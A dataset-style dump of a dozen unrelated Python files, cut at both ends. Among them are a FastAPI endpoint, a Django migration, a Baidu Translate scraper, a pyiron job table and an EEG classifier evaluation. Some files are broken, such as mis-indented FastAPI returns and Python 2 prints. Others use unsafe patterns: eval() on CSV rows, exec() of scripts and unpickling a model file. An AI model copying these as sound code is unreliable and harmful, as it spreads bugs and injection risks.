password_frame="//*[@class='left-container float_left']//*[@class='light-input-container wd400']" |
998,361 | 65fbe5a46c2753d44339c5b0c4020b315b743ca5 | import pandas as pd
import matplotlib.pyplot as plt
import random
out_t=pd.read_csv("2_positive_percentage_fragmentswise_for_last_year_shampoo.csv")
# Brands to compare (earlier alternative kept for reference):
#lis= ["l'oreal",'Dove',"Pantene"]
lis= ["l'oreal",'Dove',"Head & Shoulders"]
out_t = out_t[out_t['Brand_name'].isin(lis)]
x1 = list(out_t.Month.unique())
br = out_t.Brand_name.unique()
y1=[]
y2=[]
i=0
# Two stacked subplots; one line per plotted series.
f , plt1 = plt.subplots(2,1)
plt2 = plt1.flatten()
j=0
n=4
for b1 in br:
    print (b1)
    # NOTE(review): `not in` is a SUBSTRING test against the literal
    # "Head & Shoulders", not inequality — presumably `!=` was meant.
    if b1 not in "Head & Shoulders":
        # NOTE(review): "Pa" matches no full brand name, so its series is
        # all zeros; also plt2 has only 2 axes while j can reach 3, which
        # will IndexError on the second brand — confirm the intended layout.
        b2 = ["Pa",b1]
        for b in b2:
            # Python 2 print statements below; this script is not Python 3 ready.
            print b
            rev = out_t[out_t.Brand_name == b]
            x2 = list(rev.Month.unique())
            y2=[]
            # Build a 12-entry series, one value per month, 0 when absent.
            for i in range(1,13):
                if i in x2:
                    for row in rev.to_dict("records"):
                        if row['Month'] == i:
                            y2.append(row['positive'])
                else:
                    y2.append(0)
            print y2,b
            plt2[j].plot(x1, y2, label = b)
            j=j+1
#plt1.xlabel('Months')
# naming the y axis
#plt1.ylabel('Positive percentage')
for ax in plt1.flat:
    ax.set(xlabel='Months', ylabel='%pos')
    ax.legend()
# show a legend on the plot
# function to show the plot
plt.show()
998,362 | ec17adc6700ea89b58266dff234f968cea277815 | from fastapi import FastAPI
import uvicorn
app = FastAPI()
@app.get("/")
async def root():
    # Root endpoint: returns the "good" grade and its badge image URL.
    return {"grade": "good", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
@app.get("/1/")
async def good():
    # Grade 1: "good".
    return {"grade": "good", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fccw0Ec%2FbtqEGT3j7wD%2FRgRM2mESHJ0Jcdij1vQcgK%2Fimg.png"}
@app.get("/2/")
async def moderate():
return {"grade": "moderate", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fccw0Ec%2FbtqEGT3j7wD%2FRgRM2mESHJ0Jcdij1vQcgK%2Fimg.png"}
@app.get("/3/")
async def bad():
return {"grade": "bad", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
@app.get("/4/")
async def very_bad():
return {"grade": "very_bad", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", port=8080)
|
998,363 | 7da22eb59a6c026ac0952158788b8c3919b313fc | import logging
import pytest
from pathlib import Path
from pprint import pprint
from openpyxl import load_workbook
from util.read_excel_data import get_yaml
# @pytest.fixture(scope='session')
# def load_testdata_from_caseexcel():
# def _load_testdata_from_caseexcel(project, apiName):
# excel_path = Path(f'projects/{project}/data/{project}.xlsx')
# wb = load_workbook(excel_path)
# # ws = wb.get_sheet_by_name('phone_test')#弃用
# ws = wb[apiName]
# title = list(ws.values)[1]
# test_data = list(ws.values)[2:]
# exec_index = title.index('exec')
# case_data_list = []
# for i in test_data:
# if i[exec_index] in ['Y','y']:
# case_data_dict = dict(zip(title,i[:-2]))
# case_data_list.append(case_data_dict)
# yaml_file = Path(f'projects/{project}/conf/{apiName}.yaml')
# api_info = get_yaml(yaml_file)
# api_info.pop('parmas')
# api_info.pop('response_assert')
# case_data_list.append(api_info)
# return case_data_list
# return _load_testdata_from_caseexcel
# collect_ignore = ["projects/BigData/"]
# Tell pytest's collector to skip everything under projects/VBA.
collect_ignore_glob = ['projects/VBA']
def set_log(caplog):
    """Raise the captured log threshold to CRITICAL (caplog is pytest's
    log-capture fixture), silencing lower-severity records in test output."""
    caplog.set_level(logging.CRITICAL)
# Nothing to do when run directly; the conftest is consumed by pytest.
if __name__ == '__main__':
    # load_testdata_from_caseexcel('BigData')
    pass
|
998,364 | 641762c242004fd9968e2ac6f7f0093675cfc2ed | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-07 15:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: replaces the separate Date and Time
    # models with one combined DateTime model (date + start/end times) and
    # repoints Appointment.date at it.

    dependencies = [
        ('appointment', '0001_initial'),
    ]

    operations = [
        # New combined model holding a date and a start/end time pair.
        migrations.CreateModel(
            name='DateTime',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField()),
                ('time_start', models.TimeField()),
                ('time_end', models.TimeField()),
            ],
        ),
        # Drop the FK fields before the models they point at are deleted.
        migrations.RemoveField(
            model_name='time',
            name='date',
        ),
        migrations.RemoveField(
            model_name='appointment',
            name='time',
        ),
        # Appointment.date now references the new DateTime model.
        migrations.AlterField(
            model_name='appointment',
            name='date',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='appointment.DateTime'),
        ),
        migrations.DeleteModel(
            name='Date',
        ),
        migrations.DeleteModel(
            name='Time',
        ),
    ]
|
998,365 | fcade2f9cc576c79ad8f13e9618f10136f68a986 | import tarfile
# Bundle a fixed set of files into a gzip-compressed tarball, then unpack the
# whole archive into extract_tar/.
members = (
    'content1.txt',
    'content2.txt',
    'subfolder/content3.txt',
    'subfolder/content4.txt',
)
with tarfile.open('example.tar.gz', 'w:gz') as archive:
    for member in members:
        archive.add(member)
# Re-open read-only and extract everything.
with tarfile.open('example.tar.gz', 'r:gz') as archive:
    archive.extractall('extract_tar')
|
998,366 | b3064d8495c99ef70f588d6414c5b74bb4e5b078 | # -*-coding:utf-8 -*-
# File :basicPost.py
# Author:George
# Date : 2018/12/4
"""
测试基本的post方法提交数据 需要提交数据的操作
编码 转码操作
字符串(str)====》字节(byte) encode编码(采取Unicode方式编码 使用双字节方式编码字符串)
字节(byte)====》字符串(str) decode解码
read()读取出来的是二进制数据(bit/byte) 转换成srt需要解码
针对post方法的编码
urllib.parse.urlencode(data).encode('utf-8')
"""
import json
import urllib.request
import urllib.parse
# POST a lookup word to Baidu Translate's suggestion endpoint and save the
# JSON response to disk.
url = 'http://fanyi.baidu.com/sug'
# A User-Agent header is the most basic form of request disguise.
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11'
}
word = input('请输入要查询的词语:')
# Form payload for the POST body.
data = {
    'kw': word
}
# urlencode + UTF-8 encode: POST bodies must be bytes.
data = urllib.parse.urlencode(data).encode('utf-8')
# Supplying data makes urllib issue a POST instead of a GET.
request = urllib.request.Request(url=url, headers=headers, data=data)
# Bug fix: close the HTTP response deterministically (it was never closed).
with urllib.request.urlopen(request) as result:
    # read() yields bytes; decode to str before JSON parsing.
    resultDecoded = result.read().decode('utf-8')
# Parse the JSON text, then re-serialize without ASCII escaping so CJK
# characters are written verbatim.
jsonResult = json.loads(resultDecoded)
# Bug fix: renamed from `str`, which shadowed the builtin.
json_str = json.dumps(jsonResult, ensure_ascii=False)
with open(r'F:\Testing_Automation\UnittestProjects\UnittestBasic\urllibPackges\downloads\json.json', 'w', encoding='utf-8') as fw:
    fw.write(json_str)
|
998,367 | 2424bdf6a3dbd194a3b9987e15fcf35d7c1608c4 | import os
import sys
import json
import laspy
import runpy
from src.helpers import logger,classify
logger = logger.setup_custom_logger('myapp')
# CLI arguments: <project/file name> <today's date> <previous date>
filename = sys.argv[1]
today_date = sys.argv[2]
previous_date = sys.argv[3]
# Ensure the per-run working directories exist before any stage writes to them.
if not os.path.exists('./data/' + filename + '/interim'):
    os.mkdir('./data/' + filename + '/interim')
if not os.path.exists('./data/' + filename + '/interim/extracted_images'):
    os.mkdir('./data/' + filename + '/interim/extracted_images')
if not os.path.exists('./data/' + filename + '/interim/classified_images'):
    os.mkdir('./data/' + filename + '/interim/classified_images')
################################################################################################################
# Structural progress (skipped if its output boundaries.json already exists).
logger.info('Structural progress Calculation: Started')
if not os.path.exists('./data/' + filename + '/interim/boundaries.json'):
    runpy.run_path(path_name='src/helpers/structural_progress.py')
logger.info('Structural progress Calculation: Finished')
################################################################################################################
# Finding best BIM images (skipped if best_image.json already exists).
logger.info('Finding Best BIM Images: Started')
if not os.path.exists('./data/' + filename + '/interim/best_image.json'):
    runpy.run_path(path_name='src/helpers/bim_image.py')
logger.info('Finding Best BIM Images: Finished')
################################################################################################################
# Extracting best BIM images (always re-run).
logger.info('Extracting Best BIM Images: Started')
runpy.run_path(path_name='src/helpers/extract_image.py')
logger.info('Extracting Best BIM Images: Finished')
################################################################################################################
# Classifying extracted BIM images.
logger.info('Classifying Best BIM Images : Started')
if not os.path.exists('./data/external/' + filename + '.json'):
    runpy.run_path(path_name='src/helpers/classify_multi.py')
logger.info('Classifying Best BIM Images : Finished')
################################################################################################################
# Updating construction dates.
# NOTE(review): exec (not runpy) is presumably used so the helper script can
# read this script's globals (filename, dates) — confirm before converting.
logger.info('Updating Construction Dates: Started')
exec(open('./src/helpers/adding_dates.py').read())
logger.info('Updating Construction Dates: Finished')
################################################################################################################
# Providing analysis based on the project plan.
logger.info('Project Plan Analysis: Started')  # bug fix: typo "Paln"
# Bug fix: the path was './reports'+filename (missing '/'), which never
# matched files inside the reports/ directory.
if not os.path.exists('./reports/' + filename + '.txt'):
    exec(open('./src/helpers/insight.py').read())
logger.info('Project Plan Analysis: Finished')  # made consistent with the Started message
998,368 | d6b495f67ee500957988c6900a6a4af6c90292a0 | #!/usr/bin/env python
import sys
import telnetlib
import json
import threading
import time
# Shared connection to the local JSON-RPC control port (presumably a snapcast
# snapserver, given the Client.SetVolume method used below — confirm), plus a
# monotonically increasing request id incremented by setVolume().
telnet = telnetlib.Telnet('127.0.0.1', 1705)
requestId = 1
def doRequest( j, requestId ):
    """Send one JSON-RPC request line and block until the matching response.

    j is the request already serialized as a JSON string; requestId is the
    'id' value expected back.  Returns the decoded response dict.

    NOTE(review): Python 2 style — telnet.write/read_until are handed str;
    on Python 3 telnetlib requires bytes.  If read_until hits its 2 s
    timeout it returns an empty buffer and json.loads raises; there is no
    retry limit beyond that.  TODO confirm the intended runtime is Python 2.
    """
    print("send: " + j)
    telnet.write(j + "\r\n")
    while (True):
        # Read one CRLF-terminated line (2 second timeout per read).
        response = telnet.read_until("\r\n", 2)
        jResponse = json.loads(response)
        # Skip notifications/other traffic until the response carrying our id.
        if 'id' in jResponse:
            if jResponse['id'] == requestId:
                return jResponse;
    # Unreachable: the while True loop above only exits by returning.
    return;
def setVolume(client, volume):
    """Issue a JSON-RPC 'Client.SetVolume' call for *client*.

    Uses and increments the module-global requestId so the reply can be
    matched by doRequest.
    """
    global requestId
    doRequest(json.dumps({'jsonrpc': '2.0', 'method': 'Client.SetVolume', 'params': {'client': client, 'volume': volume}, 'id': requestId}), requestId)
    requestId = requestId + 1
# CLI: <client-id> <volume>
volume = int(sys.argv[2])
setVolume(sys.argv[1], volume)
# Bug fix: `telnet.close` only referenced the bound method; it must be
# called to actually close the connection.
telnet.close()
|
998,369 | ce49a78f155df05c24354f9717b2ce0871edea26 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import pickle
import math
from temp.features import get_features
def get_samples(_index, s_s_chs, sr, _size=1.3):
    """Slice one window per start index out of the signal matrix.

    Each window covers rows [start, ceil(start + _size * sr)) of s_s_chs;
    the windows are stacked into a single numpy array.
    """
    windows = [
        s_s_chs[start:int(math.ceil(start + (_size * sr)))][:]
        for start in _index
    ]
    return np.array(windows)
def get_subdataset(_S=1, Sess=1):
    """Load one subject/session recording from train/Data_S##_Sess##.csv.

    Returns (channels, header): channels is the evaluated data rows as a
    numpy array; header is the column-name list minus its first and last
    entries.  NOTE(review): the file handle is never closed.
    """
    _file = 'train/Data_S%02d_Sess%02d.csv' % (_S, Sess)
    _f = open(_file).readlines()
    channels = []
    _header = []
    for i, _rows in enumerate(_f):
        if i > 0:
            # SECURITY NOTE(review): eval() on raw file lines executes
            # arbitrary code if the CSV is untrusted; csv/ast.literal_eval
            # would be safer.  Left as-is to preserve behavior.
            channels.append(eval(_rows))
        else:
            # Row 0 is the comma-separated header line.
            _header = _rows
    _header = _header.split(',')
    return np.array(channels), np.array(_header[1:-1])
def get_dataset(subject=1, session=1):
    """Build a feature dataset for one subject/session.

    Cuts sample windows where the last channel equals 1, extracts features
    for two of them, and labels each with 'subject_<n>'.  Returns a dict
    with 'data' (feature vectors) and 'target' (labels).
    """
    sr = 200  # sampling rate in Hz — TODO confirm against the recordings
    ch_fs_instances = []
    ch_tags_instances = []
    s_s_chs, _header = get_subdataset(subject, session)
    # Window start indices: one past each row whose last column is 1.
    _index = [i + 1 for i, d in enumerate(s_s_chs[:, -1]) if d == 1]
    instances = get_samples(_index, s_s_chs, sr)
    for f_instance in range(1, 3):  # len(instances) 60 instances
        # Drop first/last columns, transpose to channels-first.
        instance = np.array(instances[f_instance, :, 1:-1]).transpose()
        ch_fs_instances.append(get_features(instance))
        ch_tags_instances.append('subject_{0}'.format(subject))
    return {"data": ch_fs_instances, "target": ch_tags_instances}
def eval_model(dataset, clf):
    """Score *clf* on every sample of *dataset* and print per-sample results
    plus aggregate accepted/rejected counts and rates.

    dataset maps 'data' to feature vectors and 'target' to true labels.
    """
    ok_accepted = 0
    false_accepted = 0
    labels = dataset['target']
    total_tags = len(labels)
    for idx, true_tag in enumerate(labels):
        feature_vector = np.array([dataset['data'][idx]])
        print("feature_vector: ", np.shape(feature_vector))
        prediction = clf.predict(feature_vector)[0]
        # Highest class probability reported as the prediction's confidence.
        accuracy = max(max(clf.predict_proba(feature_vector)))
        print("True label: {0}, prediction: {1}, accuracy: {2}".format(true_tag, prediction, accuracy))
        if true_tag == prediction:
            ok_accepted += 1
        else:
            false_accepted += 1
    print('Ok_accepted {0}'.format(ok_accepted))
    print('false_accepted {0}'.format(false_accepted))
    print('accuracy of Ok_accepted {0}'.format(round(ok_accepted / total_tags, 10)))
    print('accuracy of false_accepted {0}'.format(round(false_accepted / total_tags, 10)))
# Evaluate the pickled classifier on subject 1 / session 1.
subject = 1
session = 1
dataset = get_dataset(subject, session)
# Bug fix: the file handle was opened and never closed; use a context
# manager.  SECURITY NOTE: pickle.load is only safe on trusted model files.
with open('clf.sav', 'rb') as model:
    clf = pickle.load(model)
eval_model(dataset, clf)
|
998,370 | 913e25e9d5e3c71c3f82443dde3e709c261181f4 | import numpy as np
import os
import pandas
import datetime
import h5io
from pyfileindex import PyFileIndex
from pyiron_base.generic.util import Singleton
def filter_function(file_name):
    """Accept a path when it contains the HDF5 suffix '.h5' anywhere."""
    return file_name.find('.h5') >= 0
class FileTable(metaclass=Singleton):
    """File-system backed job database.

    Scans a project directory for '*.h5' job files (via PyFileIndex) and
    mirrors the information a job-table database would hold in an in-memory
    pandas DataFrame (self._job_table), one row per job.
    """
    def __init__(self, project):
        # Both members are built by force_reset().
        self._fileindex = None
        self._job_table = None
        self._project = os.path.abspath(project)
        # Column order of the job table.
        self._columns = ['id', 'status', 'chemicalformula', 'job', 'subjob', 'projectpath', 'project', 'timestart',
                         'timestop', 'totalcputime', 'computer', 'hamilton', 'hamversion', 'parentid', 'masterid',
                         'username']
        self.force_reset()
    @property
    def viewer_mode(self):
        # The file-based backend has no read-only viewer mode.
        return None
    def force_reset(self):
        """Rebuild the file index and the job table from scratch."""
        self._fileindex = PyFileIndex(
            path=self._project,
            filter_function=filter_function
        )
        df = pandas.DataFrame(self.init_table(fileindex=self._fileindex.dataframe))
        if len(df) != 0:
            df.id = df.id.astype(int)
            self._job_table = df[np.array(self._columns)]
        else:
            # No jobs found: keep an empty frame with the expected columns.
            self._job_table = pandas.DataFrame({k: [] for k in self._columns})
    def init_table(self, fileindex, working_dir_lst=None):
        """Turn file-index rows into job dicts, assigning sequential ids and
        linking jobs whose project equals another job's working directory to
        that job as master."""
        if working_dir_lst is None:
            working_dir_lst = []
        # Only files, sorted by path for deterministic id assignment.
        fileindex = fileindex[~fileindex.is_directory]
        fileindex = fileindex.iloc[fileindex.path.values.argsort()]
        job_lst = []
        for path, mtime in zip(fileindex.path, fileindex.mtime):
            job_dict = self.get_extract(path, mtime)
            job_dict['id'] = len(working_dir_lst) + 1
            working_dir_lst.append(job_dict['project'][:-1] + job_dict['subjob'] + '_hdf5/')
            # A job living inside another job's working directory is a child.
            if job_dict['project'] in working_dir_lst:
                job_dict['masterid'] = working_dir_lst.index(job_dict['project']) + 1
            else:
                job_dict['masterid'] = None
            job_lst.append(job_dict)
        return job_lst
    def add_item_dict(self, par_dict):
        """Append a new job row; missing fields get defaults.  Returns the
        new job id (max existing id + 1)."""
        par_dict = dict((key.lower(), value) for key, value in par_dict.items())
        if len(self._job_table) != 0:
            job_id = np.max(self._job_table.id.values) + 1
        else:
            job_id = 1
        default_values = {
            'id': job_id,
            'status': 'initialized',
            'chemicalformula': None,
            'timestart': datetime.datetime.now(),
            'computer': None,
            'parentid': None,
            'username': None,
            'timestop': None,
            'totalcputime': None,
            'masterid': None
        }
        for k, v in default_values.items():
            if k not in par_dict.keys():
                par_dict[k] = v
        self._job_table = pandas.concat([
            self._job_table,
            pandas.DataFrame([par_dict])[self._columns]
        ]).reset_index(drop=True)
        return int(par_dict['id'])
    def item_update(self, par_dict, item_id):
        """Overwrite the given columns of the row with id *item_id*."""
        if isinstance(item_id, list):
            item_id = item_id[0]
        # NOTE(review): str ids pass through float before the int() below —
        # presumably to accept values like "5.0"; confirm.
        if isinstance(item_id, str):
            item_id = float(item_id)
        for k, v in par_dict.items():
            self._job_table.loc[self._job_table.id == int(item_id), k] = v
    def delete_item(self, item_id):
        """Drop the row with id *item_id*; raises ValueError if absent."""
        item_id = int(item_id)
        if item_id in [int(v) for v in self._job_table.id.values]:
            self._job_table = self._job_table[self._job_table.id != item_id].reset_index(drop=True)
        else:
            raise ValueError
    def get_item_by_id(self, item_id):
        """Return the row with id *item_id* as a plain column->value dict."""
        item_id = int(item_id)
        return {k: list(v.values())[0] for k, v in self._job_table[self._job_table.id == item_id].to_dict().items()}
    def get_items_dict(self, item_dict, return_all_columns=True):
        """Filter rows by the column->value pairs in *item_dict*.

        Id-like columns are compared as ints; values containing '%' are
        treated as SQL-LIKE substring patterns.  Returns a list of row dicts
        (or id-only dicts when return_all_columns is False).
        """
        df = self._job_table
        if not isinstance(item_dict, dict):
            raise TypeError
        for k, v in item_dict.items():
            if k in ['id', 'parentid', 'masterid']:
                df = df[df[k] == int(v)]
            elif "%" not in str(v):
                df = df[df[k] == v]
            else:
                df = df[df[k].str.contains(v.replace('%', ''))]
        df_dict = df.to_dict()
        if return_all_columns:
            return [{k: v[i] for k, v in df_dict.items()} for i in df_dict['id'].keys()]
        else:
            return [{'id': i} for i in df_dict['id'].values()]
    def update(self):
        """Refresh statuses from the HDF5 files and append rows for any new
        job files found on disk."""
        self._job_table.status = [
            self._get_job_status_from_hdf5(job_id)
            for job_id in self._job_table.id.values
        ]
        self._fileindex.update()
        if len(self._job_table) != 0:
            # Known job files/working dirs, used to recognize new files.
            files_lst, working_dir_lst = zip(*[[project + subjob[1:] + '.h5', project + subjob[1:] + '_hdf5']
                                               for project, subjob in zip(self._job_table.project.values,
                                                                          self._job_table.subjob.values)])
            df_new = self._fileindex.dataframe[
                ~self._fileindex.dataframe.is_directory & ~self._fileindex.dataframe.path.isin(files_lst)]
        else:
            files_lst, working_dir_lst = [], []
            df_new = self._fileindex.dataframe[~self._fileindex.dataframe.is_directory]
        if len(df_new) > 0:
            job_lst = self.init_table(fileindex=df_new, working_dir_lst=list(working_dir_lst))
            df = pandas.DataFrame(job_lst)[self._columns]
            if len(files_lst) != 0 and len(working_dir_lst) != 0:
                self._job_table = pandas.concat([self._job_table, df]).reset_index(drop=True)
            else:
                self._job_table = df
    def get_db_columns(self):
        """Alias for get_table_headings()."""
        return self.get_table_headings()
    def get_table_headings(self):
        """Return the job table's column names."""
        return self._job_table.columns.values
    def job_table(
        self,
        project=None,
        recursive=True,
        columns=None,
        all_columns=False,
        sort_by="id",
        max_colwidth=200,
        full_table=False,
        job_name_contains=''
    ):
        """Return a (optionally filtered/sorted) view of the job table.

        recursive matches sub-projects by substring; full_table lifts the
        pandas display limits as a side effect.
        """
        if project is None:
            project = self._project
        if columns is None:
            columns = ["job", "project", "chemicalformula"]
        if all_columns:
            columns = self._columns
        if len(self._job_table) != 0:
            if recursive:
                df = self._job_table[self._job_table.project.str.contains(project)]
            else:
                df = self._job_table[self._job_table.project == project]
        else:
            df = self._job_table
        # Display-option side effects apply process-wide, not just here.
        if full_table:
            pandas.set_option('display.max_rows', None)
            pandas.set_option('display.max_columns', None)
        else:
            pandas.reset_option('display.max_rows')
            pandas.reset_option('display.max_columns')
        pandas.set_option("display.max_colwidth", max_colwidth)
        if len(df) == 0:
            return df
        if job_name_contains != '':
            df = df[df.job.str.contains(job_name_contains)]
        if sort_by in columns:
            return df[columns].sort_values(by=sort_by)
        return df[columns]
    def get_jobs(self, project=None, recursive=True, columns=None):
        """Return the selected columns of the job table as a dict of lists."""
        if project is None:
            project = self._project
        if columns is None:
            columns = ["id", "project"]
        df = self.job_table(project=project, recursive=recursive, columns=columns)
        if len(df) == 0:
            dictionary = {}
            for key in columns:
                dictionary[key] = list()
            return dictionary
        # return {key: list() for key in columns}
        dictionary = {}
        for key in df.keys():
            dictionary[key] = df[
                key
            ].tolist()  # ToDo: Check difference of tolist and to_list
        return dictionary
    def get_job_ids(self, project=None, recursive=True):
        """Return just the job ids for *project*."""
        return self.get_jobs(project=project, recursive=recursive, columns=['id'])["id"]
    def get_job_id(self, job_specifier, project=None):
        """Resolve a job name (or pass through an int id) to a job id.

        Tries an exact project match first, then a substring match; returns
        None when nothing matches and raises ValueError on ambiguity.
        """
        if project is None:
            project = self._project
        if isinstance(job_specifier, (int, np.integer)):
            return job_specifier  # is id
        # NOTE(review): the replace() result is discarded — str.replace is
        # not in-place; likely intended
        # job_specifier = job_specifier.replace(".", "_").  TODO confirm.
        job_specifier.replace(".", "_")
        job_id_lst = self._job_table[
            (self._job_table.project == project) & (self._job_table.job == job_specifier)].id.values
        if len(job_id_lst) == 0:
            job_id_lst = self._job_table[
                self._job_table.project.str.contains(project) & (self._job_table.job == job_specifier)].id.values
        if len(job_id_lst) == 0:
            return None
        elif len(job_id_lst) == 1:
            return int(job_id_lst[0])
        else:
            raise ValueError(
                "job name '{0}' in this project is not unique".format(job_specifier)
            )
    def get_child_ids(self, job_specifier, project=None, status=None):
        """
        Get the child jobs of a specific master job.

        Args:
            job_specifier (str/int): name or id of the master job
            project (str): project path to resolve the master job in
                (defaults to this table's project)
            status (str): only return children matching this status -
                None by default

        Returns:
            list: sorted list of child job IDs
        """
        if project is None:
            project = self._project
        id_master = self.get_job_id(project=project, job_specifier=job_specifier)
        if id_master is None:
            return []
        else:
            if status is not None:
                id_lst = self._job_table[
                    (self._job_table.masterid == id_master) & (self._job_table.status == status)].id.values
            else:
                id_lst = self._job_table[(self._job_table.masterid == id_master)].id.values
            return sorted(id_lst)
    def get_job_working_directory(self, job_id):
        """
        Get the working directory of a particular job

        Args:
            job_id (int):

        Returns:
            str: working directory as absolute path
        """
        try:
            db_entry = self.get_item_by_id(job_id)
            if db_entry and len(db_entry) > 0:
                # subjob is stored as '/<name>'; strip the leading slash.
                job_name = db_entry["subjob"][1:]
                return os.path.join(
                    db_entry["project"],
                    job_name + "_hdf5",
                    job_name,
                )
            else:
                return None
        except KeyError:
            return None
    def _get_job_status_from_hdf5(self, job_id):
        """Read a job's status string from its HDF5 file."""
        db_entry = self.get_item_by_id(job_id)
        job_name = db_entry["subjob"][1:]
        return get_job_status_from_file(
            hdf5_file=os.path.join(db_entry["project"], job_name + ".h5"),
            job_name=job_name
        )
    def get_job_status(self, job_id):
        """Return the cached status for *job_id* from the in-memory table."""
        return self._job_table[self._job_table.id == job_id].status.values[0]
    def set_job_status(self, job_id, status):
        """Write *status* both into the in-memory table and the job's HDF5 file."""
        db_entry = self.get_item_by_id(item_id=job_id)
        self._job_table.loc[self._job_table.id == job_id, 'status'] = status
        h5io.write_hdf5(db_entry["project"] + db_entry["subjob"] + '.h5',
                        status,
                        title=db_entry["subjob"][1:] + '/status',
                        overwrite="update")
    @staticmethod
    def get_extract(path, mtime):
        """Build a job-table row dict for the HDF5 file at *path* with
        modification time *mtime* (epoch seconds)."""
        basename = os.path.basename(path)
        job = os.path.splitext(basename)[0]
        time = datetime.datetime.fromtimestamp(mtime)
        return {
            'status': get_job_status_from_file(hdf5_file=path, job_name=job),
            'chemicalformula': None,
            'job': job,
            'subjob': '/' + job,
            'projectpath': None,
            'project': os.path.dirname(path) + '/',
            'timestart': time,
            'timestop': time,
            'totalcputime': 0.0,
            'computer': None,
            'username': None,
            'parentid': None,
            'hamilton': get_hamilton_from_file(hdf5_file=path, job_name=job),
            'hamversion': get_hamilton_version_from_file(hdf5_file=path, job_name=job)
        }
def get_hamilton_from_file(hdf5_file, job_name):
    """Return the bare class name parsed from the stored '<job>/TYPE' string
    (e.g. "<class 'pkg.Mod.Name'>" -> 'Name')."""
    return h5io.read_hdf5(hdf5_file, job_name + '/TYPE').split(".")[-1].split("'")[0]
def get_hamilton_version_from_file(hdf5_file, job_name):
    """Return the job's stored '<job>/VERSION' value from its HDF5 file."""
    return h5io.read_hdf5(hdf5_file, job_name + '/VERSION')
def get_job_status_from_file(hdf5_file, job_name):
    """Return the job's stored '<job>/status' value from its HDF5 file."""
    return h5io.read_hdf5(hdf5_file, job_name + '/status')
|
998,371 | ca635aa55f53e6b76038347ac6499c41807dc1d7 | import json as json
# Count how many entries in dic.json (values containing a '/MM/' month
# segment) fall in each month, then print a per-month summary.
with open('dic.json') as dic_file:
    dic = json.load(dic_file)
month = ['', 'January', 'February', 'March', 'April', 'May', 'June',
         'July', 'August', 'September', 'October', 'November', 'December']
count = [0] * 13  # index 0 unused so count[m] lines up with month[m]
for x in dic:
    for y in range(1, 13):
        # Zero-pad so '/01/'..'/09/' match.  Bug fix: the original used
        # `.find(...) > 0`, which silently missed a match at position 0.
        if '/%02d/' % y in dic[x]:
            count[y] += 1
for x in range(1, 13):
    # Bug fix: singular form only for exactly one friend — the original
    # printed "0 friend." for empty months.
    if count[x] == 1:
        print(month[x] + ' has ' + str(count[x]) + ' friend.')
    else:
        print(month[x] + ' has ' + str(count[x]) + ' friends.')
|
998,372 | 1afa263c6fc8423e448f0b626ffce70ca9454621 | from __future__ import absolute_import, division, print_function
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME cxi.gain_map
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT
import sys,time,math
import numpy
from libtbx import easy_pickle
import libtbx.load_env
from libtbx.option_parser import option_parser
from scitbx.array_family import flex
from xfel.cxi.cspad_ana import cspad_tbx
from xfel.cxi.cspad_ana import parse_calib
from iotbx.detectors.cspad_detector_formats import address_and_timestamp_from_detector_format_version
from xfel.cxi.cspad_ana.cspad_tbx import evt_timestamp
# Fake objects to emulate the minimal functionality so that we can reuse the
# functions CsPad2x2Image and CsPadDetector in cspad_tbx.py
def fake_get_config(address, env):
    """Stand-in for cspad_tbx.getConfig: ignores its arguments and always
    hands back a fresh fake_config."""
    return fake_config()
# Monkey-patch the real lookup so cspad_tbx uses the fake configuration.
cspad_tbx.getConfig = fake_get_config
class fake_cspad_ElementV2(object):
  """Bare-bones stand-in for a CsPad ElementV2: stores a data array and a
  quadrant index and exposes them through the same accessor methods."""

  def __init__(self, data, quad):
    self._payload = data
    self._quadrant = quad

  def data(self):
    """Return the stored detector data."""
    return self._payload

  def quad(self):
    """Return the stored quadrant index."""
    return self._quadrant
class fake_config(object):
  """Static CsPad configuration stub: eight sections per quad, all four
  quadrants enabled, all eight ROIs enabled."""

  def sections(self, i):
    # Section indices 0-7, regardless of which quad is queried.
    return list(range(8))

  def quadMask(self):
    return 0b1111  # == 15: all four quadrants active

  def roiMask(self, i):
    return 0xFF  # == 255: all eight ROIs active
class fake_env(object):
  """Environment stub whose getConfig always yields the config it was built
  with.  XXX Not tested! (carried over from the original)"""

  def __init__(self, config):
    self._cfg = config

  def getConfig(self, Id, address):
    # The stored config is returned for any (Id, address) pair.
    return self._cfg
class fake_evt(object):
  """Event stub: hands back a preset list of quad elements plus a wall-clock
  timestamp object.  XXX Not tested! (carried over from the original)"""

  def __init__(self, data3d):
    self._quads = data3d

  def getCsPadQuads(self, address, env):
    # Same quad list regardless of (address, env).
    return self._quads

  def getTime(self):
    class fakeTime(object):
      """Snapshot of 'now' split into whole seconds plus a sub-second part.
      NOTE(review): n is computed as (t - s) * 1000, i.e. milliseconds,
